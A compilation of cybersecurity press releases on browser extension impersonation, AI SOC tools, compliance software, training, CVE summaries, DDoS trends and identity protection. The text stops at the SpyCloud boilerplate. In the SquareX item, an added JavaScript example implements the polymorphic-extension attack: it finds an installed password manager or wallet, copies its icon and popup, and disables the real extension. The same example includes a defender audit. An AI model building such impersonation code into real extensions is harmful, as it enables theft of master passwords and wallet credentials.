Palo Alto, Singapore, March 6th, 2025, CyberNewsWire

With recent attack disclosures such as Browser Syncjacking and extension infostealers, browser extensions have become a primary security concern at many organizations. SquareX’s research team has identified a new class of malicious extensions that can impersonate any extension installed in the victim’s browser, including password managers and crypto wallets. These malicious extensions can morph themselves to present the same user interface, icons and text as the legitimate extension, making it highly likely that victims will enter their credentials and other sensitive information into the impostor. The attack affects most major browsers, including Chrome and Edge.

Polymorphic extensions exploit the fact that most users interact with extensions through the icons pinned to the browser toolbar. The attack begins with the user installing the malicious extension, which disguises itself, for example, as an unassuming AI tool. To make the attack more convincing, the extension actually performs the AI functionality as advertised and remains benign for a predetermined period of time.

While this is happening, the malicious extension works out which other extensions are installed in the victim’s browser. Once it has identified a target, the polymorphic extension changes its own appearance to match it, including the icon shown in the pinned toolbar, and can temporarily disable the target so that only the impostor’s copy of the icon remains pinned. Because most users rely on these icons as visual confirmation of which extension they are interacting with, changing the icon alone is likely enough to convince the average user that they are clicking on the legitimate extension. Even if the victim opens the browser’s extensions management page, there is no obvious way to correlate the entries listed there with the pinned icons. The one reliable discriminator is the extension ID: right-clicking a pinned icon and choosing “Manage extension” opens that extension’s own details page, and an impostor cannot share the legitimate extension’s ID, but few users will think to check.

Critically, the polymorphic extension can impersonate any browser extension. For example, it can mimic a popular password manager to trick the victim into entering their master password, which the attacker can then use to log in to the real password manager and read every credential stored in the vault. Similarly, it can mimic a popular crypto wallet, and the stolen credentials then allow the attacker to authorize transactions that send cryptocurrency to an address they control. Other potential targets include developer tools and banking extensions that may give the attacker unauthorized access to applications where sensitive data or financial assets are stored.

Furthermore, the attack requires only permissions that the Chrome Web Store classifies as medium risk. Ironically, many of these permissions are used by password managers themselves, as well as by other popular tools such as ad blockers and page stylers, which makes it especially difficult for the Chrome Web Store and security teams to identify malicious intent just by inspecting the extension’s code or permission list.
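As an added illustration that is not part of the SquareX release or its proof of concept, the JavaScript below models the flow just described (enumerate installed extensions, morph the toolbar action into a target, disable the target) on top of documented MV3 extension APIs, and pairs it with a defender-side audit over the same `chrome.management.getAll()` output. The release does not say which permissions the proof of concept used; the example assumes the impostor holds `management`, which `getAll()` and `setEnabled()` require. The `chrome.*` stand-in, the sample inventory, the extension IDs, the target names and the asset paths are all constructed for the example.

```javascript
// Added example, not code from SquareX or its proof of concept. Models the
// polymorphic-extension flow with documented MV3 APIs (chrome.management
// getAll/setEnabled, chrome.action setIcon/setTitle/setPopup) plus a
// defender-side audit. Target names, asset paths, extension IDs and the
// chrome.* stand-in are constructed; the real APIs return Promises.

// ASSUMED: the impostor bundles look-alike assets for each target it can
// impersonate. Paths are hypothetical.
const TARGETS = {
  "1Password": { icon: "assets/pm.png", popup: "popups/pm.html" },
  MetaMask: { icon: "assets/wallet.png", popup: "popups/wallet.html" },
};

// Step 1: pick the first enabled target from a chrome.management.getAll() result.
function selectTarget(installed, targets = TARGETS) {
  return installed.find(
    (e) => e.type === "extension" && e.enabled &&
      Object.prototype.hasOwnProperty.call(targets, e.name)
  ) || null;
}

// Steps 2-3 as a pure plan: the API calls that morph the toolbar action into
// `target` and then disable the real extension. Keeping this pure makes the
// sequence reviewable and testable without a browser.
// ASSUMED: the impostor holds the "management" permission.
function planMorph(target, targets = TARGETS) {
  const look = targets[target.name];
  return [
    ["action.setIcon", { path: look.icon }],
    ["action.setTitle", { title: target.name }],
    ["action.setPopup", { popup: look.popup }],
    ["management.setEnabled", target.id, false],
  ];
}

// Execute a plan against chrome.* (or a stand-in with the same shape).
async function applyPlan(api, plan) {
  for (const [call, ...args] of plan) {
    const [ns, fn] = call.split(".");
    await api[ns][fn](...args);
  }
}

// Full attacker flow: enumerate, choose, morph, disable. Returns the target
// it impersonated, or null if none of the known targets is installed.
async function morphIntoInstalledTarget(api, targets = TARGETS) {
  const installed = await api.management.getAll();
  const target = selectTarget(installed, targets);
  if (!target) return null;
  await applyPlan(api, planMorph(target, targets));
  return target;
}

// Defender side: two signals visible in the same getAll() snapshot.
//  - an extension holding "management" can disable others (prerequisite for step 3);
//  - a password manager or wallet that is installed but disabled is exactly
//    the state the attack leaves behind.
// Runtime icon/title changes are NOT exposed by this API, which is why the
// release argues static checks alone are insufficient.
function auditSnapshot(installed, sensitiveNames = Object.keys(TARGETS)) {
  const findings = [];
  for (const e of installed) {
    if ((e.permissions || []).includes("management")) {
      findings.push({ id: e.id, name: e.name, issue: "holds management permission" });
    }
    if (sensitiveNames.includes(e.name) && !e.enabled) {
      findings.push({ id: e.id, name: e.name, issue: "sensitive extension disabled" });
    }
  }
  return findings;
}

// Constructed stand-in for chrome.* so the example runs offline in Node.
function makeFakeChrome(installed) {
  const state = { icon: null, title: null, popup: null, installed: installed.map((e) => ({ ...e })) };
  return {
    state,
    action: {
      setIcon: async ({ path }) => { state.icon = path; },
      setTitle: async ({ title }) => { state.title = title; },
      setPopup: async ({ popup }) => { state.popup = popup; },
    },
    management: {
      getAll: async () => state.installed.map((e) => ({ ...e })),
      setEnabled: async (id, enabled) => {
        const e = state.installed.find((x) => x.id === id);
        if (e) e.enabled = enabled;
      },
    },
  };
}

// Constructed inventory (IDs are placeholders, not real Web Store IDs).
const SAMPLE = [
  { id: "pm-target-0001", name: "1Password", type: "extension", enabled: true, permissions: ["tabs", "storage"] },
  { id: "ai-tool-0002", name: "Helpful AI Summarizer", type: "extension", enabled: true, permissions: ["management", "storage"] },
];

async function demo() {
  const api = makeFakeChrome(SAMPLE);
  console.log("audit before:", auditSnapshot(await api.management.getAll()));
  const target = await morphIntoInstalledTarget(api);
  console.log("morphed into:", target && target.name, api.state);
  console.log("audit after:", auditSnapshot(await api.management.getAll()));
}

if (typeof require !== "undefined" && require.main === module) demo();
```

Running `demo()` shows the audit going from one finding (the AI tool holding `management`) to two once the password manager has been disabled; in a real fleet the same two checks can be run over exported extension inventories, but they only catch the prerequisite and the aftermath, not the icon swap itself.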

The founder of SquareX, Vivek Ramachandran, cautions that “Browser extensions present a major risk to enterprises and users today. Unfortunately, most organizations have no way of auditing their current extension footprint or of checking whether any of those extensions are malicious. This further underscores the need for a browser-native security solution like Browser Detection and Response, similar to what an EDR is to the operating system.”

These polymorphic extensions use supported Chrome features rather than a bug, so there is no patch to apply; mitigation requires the browser to change how it exposes or surfaces those features. SquareX has disclosed the technique to the Chrome team, recommending that extension icon changes and abrupt changes to an extension’s HTML be either blocked or surfaced to the user as alerts, since these are precisely the levers an impostor uses in a polymorphic attack. For enterprises, static extension analysis and permission-based policies are not sufficient on their own: a browser-native security control that analyses extension behaviour at runtime, including such morphing, is needed.

For more information about polymorphic extensions, additional findings from this research are available at https://sqrx.com/polymorphic-extensions.

About SquareX

SquareX helps organizations detect, mitigate, and threat-hunt client-side web attacks happening against their users in real time, including defending against malicious extensions. In addition to the polymorphic attack, SquareX was also the first to discover and disclose multiple extension-based attacks, including Browser Syncjacking, the Chrome Store consent phishing attack leading to Cyberhaven’s breach and numerous other MV3-compliant malicious extensions revealed at DEF CON 32.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions. 

Contact

Head of PR
Junice Liew
SquareX
junice@sqrx.com

The post SquareX Unveils Polymorphic Extensions that Morph Infostealers into Any Browser Extension – Password Managers, Wallets at Risk appeared first on Cybersecurity Insiders.

Boston, United States and Tel Aviv, Israel, March 4th, 2025, CyberNewsWire

Pathfinder AI expands Hunters’ vision for AI-driven SOCs, introducing Agentic AI for autonomous investigation and response.

Hunters, the leader in next-generation SIEM, today announced Pathfinder AI, a major step toward a more AI-driven SOC. Building on Copilot AI, which is already transforming SOC workflows with LLM-powered investigation guidance, Hunters is introducing its Agentic AI vision, designed to autonomously enhance detection, investigation, and response. Agentic AI will launch soon, with ongoing innovations to further streamline security operations.

“Hunters has already made a significant impact on our security operations by reducing manual investigations, streamlining data ingestion, and improving threat visibility. With Pathfinder AI, we’re enhancing efficiency and response times through AI-driven detection explanations and automated investigative guidance. This innovation continues to strengthen Emburse’s security posture with cutting-edge AI-powered threat intelligence.” — Casey Sword, Endpoint Security Architect, Emburse

How AI is Shaping the Future of Security Operations

Security investigations are complex and unpredictable—each alert triggers multiple investigative steps, creating an overwhelming number of possible paths. Traditional automation follows rigid workflows, often leaving analysts stuck chasing false leads while real threats slip through.

AI changes the equation. Unlike static rule-based automation, Agentic AI dynamically adapts, prioritizing critical threats, filtering out noise, and continuously refining investigations to keep security teams focused and efficient.

To stay ahead of evolving threats, SOCs need two key AI-driven capabilities:

  • Copilot AI – Enhances analyst workflows with automated data analysis, report generation, and guided investigations.
  • Agentic AI – Delivers autonomous threat detection, investigation, and response, reducing manual workloads and accelerating decision-making.

By leveraging specialized AI agents that collaborate in real time, security teams can move beyond manual triage and fragmented investigations—operating faster, smarter, and with greater precision.

Hunters Pathfinder AI

From day one, Hunters was founded with the vision of embedding analyst intelligence into the SIEM: automating triage and investigation to maximize efficiency and accuracy. With years of experience refining AI-driven security operations, the company is well positioned to lead the AI-driven SOC transformation, applying that expertise to deliver automation at scale.

As Hunters Pathfinder AI evolves, the company is expanding its capabilities in two areas: the AI-Assisted SOC and the AI-Driven SOC. These advancements will further reduce manual workloads while enhancing detection, investigation, and response.

AI-Assisted SOC with Copilot AI

  • Lead Summarization – AI-generated summaries that provide analysts with immediate and comprehensive context on security events.
  • Guided Investigation Workflows – Suggests next steps across the entire attack surface.
  • Natural Language Querying – Enables SOC analysts to interact with the system using conversational AI to retrieve insights efficiently.
  • Custom Detection Authoring – Helps analysts refine detections with guided logic and iterative fine-tuning.
  • Threat Classification – AI evaluates signals and context to determine whether a threat is benign or malicious, reducing manual triage time.

AI-Driven SOC with Agentic AI

  • Autonomous Triage and Classification – AI-driven agents investigate every threat, classifying incidents and providing full investigation reports.
  • Self-Optimizing Detections – Machine learning models continuously refine detection accuracy based on real-world attack data.
  • Automated Root Cause Analysis – AI correlates attack signals across multiple sources to provide full attack narratives.

“Pathfinder AI is a game-changer for SOC teams, allowing us to deliver on our promise of making security operations more effective in the fight against cyber threats. By combining Copilot AI and Agentic AI, we are not just automating tasks but enabling security teams to focus on what truly matters—stopping real threats before they cause harm.” — Ian Forrest, VP of Product, Hunters

The Road Ahead

Hunters remains committed to pushing the boundaries of SOC automation with AI-driven investigations, automated response mechanisms, and deeper AI capabilities. Pathfinder AI represents the next advancement toward a faster, smarter, and more effective security operations center and will be delivered in the upcoming months.

For more details, users can explore Hunters’ blog post and join the webinar about this announcement on March 5th, 2025.

About Hunters

Hunters empowers SOC teams with AI-driven automation, maximizing efficiency without large security budgets. As a next-gen SIEM, the Hunters SOC Platform integrates Agentic AI, Copilot AI, machine learning, and graph-based correlation to automate detection, investigation, and response. Trusted by Cimpress, OpenLane, and The RealReal, Hunters delivers built-in detections, AI-driven investigations, and security expert support from Team Axon.

For more information, users can visit Hunters Security.

Contact

Ada Filipek
Hunters
ada.filipek@hunters.ai

The post Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation appeared first on Cybersecurity Insiders.

San Francisco, California, March 3rd, 2025, CyberNewsWire

With the growing importance of security compliance for startups, more companies are seeking to achieve and maintain compliance with frameworks like SOC 2, ISO 27001 & GDPR. Bubba AI, Inc. is building a comprehensive solution for these organizations to easily integrate compliance workflows and build their own customized processes through an open-source alternative to existing GRC (Governance, Risk, and Compliance) automation platforms.

The company is positioning itself to address the compliance needs of organizations ranging from early-stage startups to established enterprises. Bubba AI’s flagship product, Comp AI, offers a built-in risk register, and policies required for frameworks while also allowing companies to build their compliance workflows using building blocks provided by the platform.

Introducing Comp AI

Comp AI is an open-source alternative to GRC automation platforms like Vanta and Drata. The platform includes several key features designed to automate compliance with frameworks such as SOC 2:

  • A built-in risk register to help companies identify, document, and assess potential security risks
  • Out-of-the-box security policies for modern companies, complete with an AI-powered editor for customization
  • A comprehensive vendor management suite for identifying, tracking, and assessing third-party vendors
  • Automated evidence-collection tools that reduce the manual burden of compliance documentation

The open source nature of Comp AI differentiates it from existing solutions in the market, allowing for greater community involvement, customization, and cost savings for companies on their compliance journey.

The Value of Open Source Compliance Solutions

Bubba AI was founded in late 2024 by Lewis Carhart. Carhart recognized a significant gap in the market for affordable, flexible compliance automation tools that could serve the needs of a wide range of companies.

“While building at previous companies, I experienced firsthand how painful and resource-intensive the compliance process can be, especially for smaller organizations. The existing solutions were either prohibitively expensive or lacked the flexibility we needed. I wanted to create an open source platform that democratizes access to compliance automation”, Lewis Carhart commented.

This experience led Carhart to develop Comp AI as an open source alternative that could help organizations of all sizes achieve SOC 2 compliance without breaking the bank or getting locked into proprietary systems.

The Ambitious Goal

Bubba AI has set an ambitious target: helping 100,000 companies achieve compliance with cyber security frameworks like SOC 2, ISO 27001 & GDPR by 2032. This goal reflects the growing importance of security certifications as businesses increasingly handle sensitive customer data and face stricter regulatory requirements.

“We believe that strong security practices shouldn’t be a luxury that only well-funded companies can afford. By providing an open source solution, we’re removing barriers to entry and empowering organizations to build robust security programs regardless of their size or resources”, said Lewis Carhart.

The company plans to build a community around its open-source platform, encouraging contributions and extensions that can benefit the broader business ecosystem.

About Bubba AI

Bubba AI, Inc. was founded at the end of 2024. Its mission is clear: help 100,000 companies get compliant with common cyber security frameworks by 2032. To do this, Bubba AI, Inc. is launching its first product – Comp AI, an open-source alternative to Vanta & Drata.

Contact

Founder
Lewis Carhart
Bubba AI, Inc.
hello@trycomp.ai

The post Bubba AI, Inc. is launching Comp AI to help 100,000 startups get SOC 2 compliant by 2032. appeared first on Cybersecurity Insiders.

Cary, NC, February 25th, 2025, CyberNewsWire

INE, the leading provider of networking and cybersecurity training and certifications, today announced its recognition as an enterprise and small business leader in online course providers and cybersecurity professional development, along with its designation as the recipient of G2’s 2025 Best Software Awards for Education Products. This category of awards ranks the world’s top 50 software education products based on authentic reviews from more than 100 million G2 users.

“We are thrilled to be recognized for a second consecutive year by G2’s Best Software Awards,” said Dara Warn, CEO of INE. “This is not only a testament to INE’s robust educational offerings but also underscores our dedication to empowering enterprise teams and professionals with the skills they need to thrive in a challenging digital landscape. We are proud to set the standard for quality and effectiveness in cybersecurity and technical education, as evidenced by the success of our students.”

G2’s Best Software Awards rank the world’s best software companies and products based on verified user reviews and publicly available market presence data. Fewer than 1% of vendors listed on G2 are named to the list. 

“The 2025 Best Software Award winners represent the very best in the industry, standing out for their exceptional performance and customer satisfaction. The stakes for choosing the right business software are higher than ever,” said Godard Abel, co-founder & CEO at G2. “With over 180,000 software products and services listings and 2.8 million verified user reviews in the G2 marketplace, we’re proud to help companies navigate these critical choices with insights rooted in authentic customer feedback. Congratulations to this year’s honorees!”

G2 badges, released quarterly, recognize INE’s strong performance compared to competitors in specific areas, including its enterprise cybersecurity training and certification offerings, the depth and breadth of its online learning library, and global impact. INE earned the following G2 badges for Winter 2025:

  • Fastest Implementation, Online Course Providers
  • Leader, Cybersecurity Professional Development
  • Leader, Online Course Providers
  • Leader, Technical Skills Development
  • Enterprise Leader, Online Course Providers
  • Small Business Leader, Online Course Providers
  • Leader, Asia Online Course Providers
  • Leader, Asia Pacific Online Course Providers
  • Momentum Leader, Technical Skills Development
  • Momentum Leader, Online Course Providers
  • Small Business High Performer, Technical Skills Development
  • High Performer, India Online Course Providers
  • High Performer, Europe Online Course Providers
  • High Performer, Asia Technical Skills Development

INE was recently named to Security Boulevard’s list of the Top 10 Hacking Certifications for both the Certified Professional Penetration Tester (eCPPT) and Web Application Penetration Tester eXtreme (eWPTX) certifications. The list showcases some of the best ethical hacking certifications for cybersecurity professionals. 

In reviewing the eCPPT, reviewers noted: 

  • The realistic experience
  • A robust training program
  • Its credentials to boost employability in Europe (specifically noted as “remarkable”). 

In reviewing the eWPTX, reviewers applaud: 

  • The challenging nature of the exam
  • Requiring advanced methodologies and skills in creating exploits that “modern tools couldn’t fathom.” 

With a suite of the best cybersecurity certifications and training programs designed for teams and individuals, INE continues to lead in developing cybersecurity professionals equipped with real-time, hands-on experience to manage cyber threats and security incidents. Our award-winning cybersecurity software and comprehensive training in network security, cloud security, and risk management, prepare learners to become certified ethical hackers (CEH), certified information systems security professionals (CISSP), and more, solidifying our reputation as the trusted partner in cybersecurity excellence and threat intelligence.

About INE: 

INE is the premier provider of online technical training for the IT industry. Harnessing the world’s most powerful hands-on lab platform, cutting-edge technology, global video distribution network, and world-class instructors, INE is the top training choice for Fortune 500 companies worldwide, and for IT professionals looking to advance their careers. INE’s suite of learning paths offers an incomparable depth of expertise across cybersecurity, cloud, networking, and data science. INE is committed to delivering the most advanced technical training on the planet, while also lowering the barriers worldwide for those looking to enter and excel in an IT career. 

Contact

Kathryn Brown
INE Security
kbrown@ine.com

The post INE Secures Spot in G2’s 2025 Top 50 Education Software Rankings appeared first on Cybersecurity Insiders.

Cary, North Carolina, February 19th, 2025, CyberNewsWire

2025 marks a time of unprecedented volatility in the technology job market. On one hand, dependence on technology is soaring. The growth of AI and machine learning is propelling a surge in new technologies, tactics, and ideas.

At the same time, organizations are trying to adapt to the changing dynamic. This has led to more job uncertainty, which the technology sector usually avoids. This year alone, roughly 7,000 jobs have been cut across dozens of tech giants, fueling growing concerns among industry professionals. 

As the technology job market weathers this volatility, INE Security, a global leader in networking and cybersecurity training, is highlighting its commitment to equipping IT professionals with the skills they need to thrive. INE focuses on practical training, certifications, and preparation. This helps networking and cybersecurity professionals succeed in a changing job market.

“Continuous learning and adaptation are more important than ever for individuals hoping to succeed in their networking and cybersecurity career,” said Dara Warn, CEO of INE Security. “It is vital that professionals maintain a continuous cycle of learning. Training gives learners the knowledge and skills they need to succeed. Hands-on practice helps them understand tasks better. Certifications show that they have learned well and prove their skill mastery.”

Key Benefits of INE’s Training and Certification Programs:

  • Enhanced Employability: Executives, supervisors, and HR professionals are completely aligned in considering industry or professional certifications the most compelling during the hiring process, according to the Society for Human Resource Management (SHRM). 
  • Practical Experience: The human element was involved in 68% of cybersecurity breaches in 2023 (Verizon’s 2024 Data Breach Investigations Report). Practical, hands-on experience and industry-recognized certifications validate the skills needed to minimize this risk. 
  • Flexible Learning Paths: From foundational courses to advanced certifications, learners can tailor their education to career goals and market needs.

“With every technological advancement, the skill sets required to manage, secure, and innovate within these systems evolve,” added Warn. “INE Security’s commitment to updating our course materials and labs ensures that our students are always at the forefront of the industry. Our focus is on making them indispensable in their current roles and highly attractive to prospective employers. INE’s training programs are more than just skill-building—they are career lifelines for professionals affected by market disruptions. ”

For more information about how INE can help you stabilize your cybersecurity and networking career goals, users can visit www.ine.com.

For a limited time, access INE Security training and certifications for up to 50% off, including eJPT, eMAPT, eCTHP, eCIR, eCDFP, and ICCA. Bundle certifications with Premium training and save even more. 

About INE Security

INE Security is the premier provider of online networking and cybersecurity training and certification.

Harnessing a powerful hands-on lab platform, cutting-edge technology, a global video distribution network, and world-class instructors, INE Security is the top training choice for Fortune 500 companies worldwide for red-team and blue-team security training in business and for IT professionals looking to advance their careers. INE Security’s suite of learning paths offers an incomparable depth of expertise across cybersecurity and is committed to delivering advanced technical training while also lowering the barriers worldwide for those looking to enter and excel in an IT career.

Contact

Kathryn Brown
INE Security
kbrown@ine.com

The post INE Security’s Cybersecurity and IT Training Enhances Career Stability in Tech appeared first on Cybersecurity Insiders.

Intel by Intruder now uses AI to contextualize NVD descriptions, helping security teams assess risk faster.

Intruder, a leader in attack surface management, has launched AI-generated descriptions for Common Vulnerabilities and Exposures (CVEs) within its free vulnerability intelligence platform, Intel. This new feature enhances cybersecurity professionals’ ability to quickly understand and assess vulnerabilities, addressing a common pain point: the often vague and technical descriptions provided by the National Vulnerability Database (NVD).

With thousands of vulnerabilities published every year, security teams rely on NVD as a key resource for researching CVEs. However, NVD descriptions frequently lack clarity or context, making it difficult to determine potential impact at a glance. Intel’s AI summaries transform NVD descriptions into clear, concise, and actionable insights, helping teams assess and respond to risks faster.

“Vulnerability management is challenging enough without the added complexity of deciphering cryptic CVE descriptions,” said Chris Wallis, CEO & Founder of Intruder. “With Intel’s AI Overviews, we’re making it easier for security professionals to quickly gauge what a vulnerability is and decide what action to take.”

Additionally, Intruder’s in-house security experts manually review the AI descriptions of the most critical vulnerabilities. These expert-reviewed CVEs are clearly marked in Intel with a “Verified by Intruder” label.

Intel, which is completely free to use, already provides powerful features such as a real-time feed of trending CVEs, a unique hype score rated out of 100, and in-depth analysis from Intruder’s security team. The addition of AI-generated CVE descriptions further strengthens Intel’s value as a go-to resource for cybersecurity professionals.

Availability

The AI-generated CVE descriptions are available now within Intel at intel.intruder.io. Cybersecurity professionals can access Intel for free today.

For more information, users can visit www.intruder.io or follow Intruder on LinkedIn and Twitter.

About Intruder

Intruder was founded in 2015 to solve the information overload crisis in vulnerability management. Its mission from day one has been to help divide the needles from the haystack, focusing on what matters, while ignoring the rest. Effective cyber security is about getting the basics right. Intruder helps do that, saving time on the easy stuff, so users can focus on the rest. It has been awarded multiple accolades, was selected for GCHQ’s Cyber Accelerator, and is now proud to have over 3,000 happy customers all over the world.

The post Intruder Enhances Free Vulnerability Intelligence Platform ‘Intel’ with AI-Generated CVE Descriptions appeared first on Cybersecurity Insiders.

Luxembourg, Luxembourg, February 11th, 2025, CyberNewsWire

Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q3-Q4 2024 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2024, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in the total number of DDoS attacks and their magnitude, measured in terabits per second (Tbps).

Key highlights from Q3-Q4 2024

●    Compared to Q3–Q4 2023, the number of DDoS attacks has risen by 56%, which highlights a steep long-term growth trend.

●    The gaming industry continues to be the most targeted by DDoS attacks, accounting for 34% of all attacks.

●    In Q3-Q4 2024, the financial services sector experienced a significant increase, accounting for 26% of all DDoS attacks, up from 12% in the previous period.

●    There was a 17% increase in the total number of attacks compared with Q1-Q2 2024.

●    The largest attack peaked at 2 Tbps in Q3-Q4 2024, an 18% increase over the largest attack of Q1-Q2 2024.

●    DDoS attacks are becoming shorter in duration but more powerful.

Attackers are shifting their focus

The sectors targeted in Q3-Q4 2024 reflect a changing focus among DDoS attackers. The technology industry’s share of DDoS attacks has risen steadily, from 7% to 19% since Q3-Q4 2023. Gcore attributes this to attackers recognising the wide-reaching disruption potential of technology services: a single successful attack can take out a service that countless organizations depend on, causing significant harm to people and businesses. Technology platforms are also attractive for their vast computational power, which, once compromised, malicious actors can harness to intensify their own attacks.

The gaming industry continues to be the most-attacked industry, although there were 31% fewer attacks compared with Q1-Q2 2024. The decline in attacks may be attributed to several factors. For instance, gaming companies are strengthening their DDoS defenses in response to ongoing attacks, which may result in fewer successful attacks. Another explanation is that attackers may be shifting their focus towards other high-value sectors, such as financial services, which saw a 117% increase in the number of attacks. The sector’s critical online services and susceptibility to ransom-based attacks make it a prime target.

Andrey Slastenov, Head of Security at Gcore, commented: “The latest Gcore Radar should be a wake-up call to businesses across all industries. Not only is the number and intensity of attacks increasing, but attackers are expanding the scope of their attacks to reach an increasingly wide range of sectors. Businesses must invest in robust DDoS detection, mitigation, and protection to prevent the financial and reputational impact of an attack.”

The geographical distribution of DDoS attacks

With a presence that spans six continents, Gcore can track the geographical sources of DDoS attacks. Gcore derives these insights from the attackers’ IP addresses and the geographic locations of the data centers where malicious traffic is targeted. One caveat for readers: source addresses in volumetric network-layer floods are frequently spoofed or belong to reflectors and compromised hosts, so “source” geography describes where attack traffic is emitted from, not necessarily where its operators sit.

Gcore’s findings highlight the Netherlands as a key source of attacks, leading application-layer attacks with 21% and ranking second for network-layer attacks at 18%. The U.S. ranked highly across both layers, reflecting the size of its internet infrastructure available for attackers to abuse.

Brazil featured prominently in network-layer attacks at 14%. Brazil’s growing digital economy and connectivity make it an emerging source of attacks. China and Indonesia also featured prominently, with Indonesia showing a growth in application-layer attacks at 8%, which reflects a broader trend of increased attack activity in Southeast Asia.

Short but potent attacks continue to take hold

DDoS attacks are becoming shorter in duration, but no less disruptive. The longest DDoS attack duration during Q3-Q4 2024 was five hours, which is a significant decrease from 16 hours in the first half of the year. This is reflective of an increasing trend towards shorter but more intense attacks. These ‘burst attacks’ can be more difficult to detect as they may blend in with normal traffic spikes. The delay in detection gives attackers a window of opportunity to disrupt services before cyber defenses can kick in.

The trend of shorter DDoS attack durations can in part be attributed to improvements in cybersecurity. As security tightens, attackers have learned to adapt with short burst attacks designed to bypass defenses. A short DDoS attack can also double as a smokescreen to conceal a secondary attack, such as ransomware deployment.

The full report is available at https://gcore.com/library/gcore-radar-ddos-attack-trends-q3-q4-2024

About Gcore  

Gcore is a global edge AI, cloud, network, and security solutions provider. Headquartered in Luxembourg, with a team of 600 operating from ten offices worldwide, Gcore provides solutions to global leaders in numerous industries. Gcore manages its global IT infrastructure across six continents, and its average response time of 30 ms worldwide gives it some of the best network performance in Europe, Africa, and LATAM. Gcore’s network consists of 180 points of presence worldwide in reliable Tier IV and Tier III data centers, with a total network capacity exceeding 200 Tbps.

Users can learn more at gcore.com or follow them on LinkedIn, Twitter, and Facebook.

Contact

Gcore press contact
pr@gcore.com

The post Gcore Radar report reveals 56% year-on-year increase in DDoS attacks appeared first on Cybersecurity Insiders.

Austin, TX, USA, February 4th, 2025, CyberNewsWire

SpyCloud’s Identity Threat Protection solutions spearhead a holistic identity approach to security, illuminating correlated hidden identity exposures and facilitating fast, automated remediation.

SpyCloud, a leading identity threat protection company, announced key innovations in its portfolio, pioneering the shift to holistic identity threat protection. By operationalizing its vast collection of darknet data with automated identity analytics that correlate malware, phishing, and breach exposures across individuals’ past and present work and personal personas, SpyCloud enables security and fraud prevention teams to comprehensively uncover hidden identity assets, rapidly remediate exposures, and better protect their businesses from previously unseen threats.  

Identity security vendors have focused narrowly on securing corporate accounts, leaving organizations vulnerable to cybercriminals exploiting the broader identity exposures of employees, consumers, and suppliers. A shift to an identity-centric perspective is needed, particularly as the scope of identity exposures continues to grow. SpyCloud research reveals that the average individual has as many as 52 unique usernames/emails and 221 passwords exposed on the darknet across their online personal and professional identities. 

The impact of these exposures is evident: nearly a quarter of data breaches resulted from compromised identity data. Credential attacks led to $4.81 million in related costs per breach and took the longest to identify and contain. 

SpyCloud’s holistic identity threat protection addresses these challenges by encompassing the full spectrum of an individual’s online presence. This innovative approach empowers security teams to proactively protect against previously unseen risks, including the darknet exposures of identity and authentication data stolen about employees, consumers, and suppliers that have been beyond their visibility to date. 

“The cybersecurity industry has spent years and billions of dollars securing accounts, but criminals have moved far beyond account-level access,” said Ted Ross, SpyCloud’s CEO and Co-Founder. “The dirty secret of the identity security industry is that efforts to lock down the perimeter fail because they focus on accounts, while bad actors target the full scope of users’ holistic identities. These sprawling identities, exposed through breaches, infostealer infections, and phishing attacks, create shadow data that traditional tools simply can’t address.”

Ross continued, “SpyCloud changes the dynamic by providing unmatched visibility into the same data criminals are exploiting, enabling organizations to remediate exposures across the entirety of users’ online personas. This shifts the advantage back to security leaders, empowering them to act on threats that were previously beyond their reach.”

Key Innovations Underpinning SpyCloud’s Holistic Identity Threat Protection 

  • Refined analytics driving actionability on exposed identities: SpyCloud applies advanced data science and proprietary technology to dynamically correlate billions of recaptured darknet data points, providing a broader and more accurate view of identities. By connecting authentication data, financial data, and personally identifiable information (PII), SpyCloud uncovers hidden relationships across seemingly unrelated accounts, continuously and at scale.
  • Automated remediation in <15 minutes: SpyCloud’s holistic identity portfolio now enables rapid, automated remediation within enterprise security ecosystems, including EDR, IdP, SOAR, and SIEM tools. This allows security teams to neutralize threats within 15 minutes of discovery, reducing risk without straining resources or operational bandwidth.
  • Malware reverse engineering to combat ransomware: SpyCloud specializes in tracking and analyzing malware – with deep insights into pervasive infostealers such as Lumma C2, Redline Stealer, Vidar, and more – as infostealer infections are often a precursor to ransomware. Through its advanced malware reverse analysis, SpyCloud provides comprehensive visibility into malware-exposed data, helping organizations identify compromised devices, users, and applications and close critical security gaps, including those stemming from unmanaged or under-managed devices used by employees, contractors, and vendors.
  • Accelerated cybercrime investigations: SpyCloud’s Investigations solution, used by cyber threat intelligence (CTI) teams, security operations, fraud and risk prevention analysts, and law enforcement globally, includes automated identity analytics to uncover the full scope of digital identity exposures, accelerating complex cybercrime investigations into threat actor attribution, insider risk (including potential hiring fraud), and supply chain risk analysis from days or hours to minutes.

SpyCloud’s Capabilities Set a New Standard for Identity Security

SpyCloud champions the transition to holistic identity security, backed by nearly a decade of experience and the industry’s largest repository of recaptured breach, malware-exfiltrated, and successfully phished data. Its holistic identity lens reveals a comprehensive view of exposed identity information – from credentials and PII to financial data and sensitive digital artifacts.

“SpyCloud’s innovative identity threat protection is about as important as it gets in cyber; identity is everything,” said John N. Stewart, SpyCloud Board Member and former Chief Security and Trust Officer of Cisco. “By making it possible to view and act on the world’s best source for identity exposures, SpyCloud raised the bar to the top for proactive defense against all types of identity-driven cyber exploitation.”

“We are redefining identity security by making holistic protection practical and achievable for our customers,” added Damon Fleury, SpyCloud’s Chief Product Officer. “SpyCloud has a long history of leading the way in understanding the cybercrime ecosystem, from our early days in world-class ATO prevention to continuing to build solutions that empower organizations to proactively protect against threats stemming from infostealer malware, phished and breach data.” 

Fleury continued, “This evolution to make holistic identity threat protection a reality for enterprises is critical to our mission of disrupting cybercrime. We aim to stop identity-based threats once and for all.”

To learn more, users can contact SpyCloud or view the following resources:

About SpyCloud

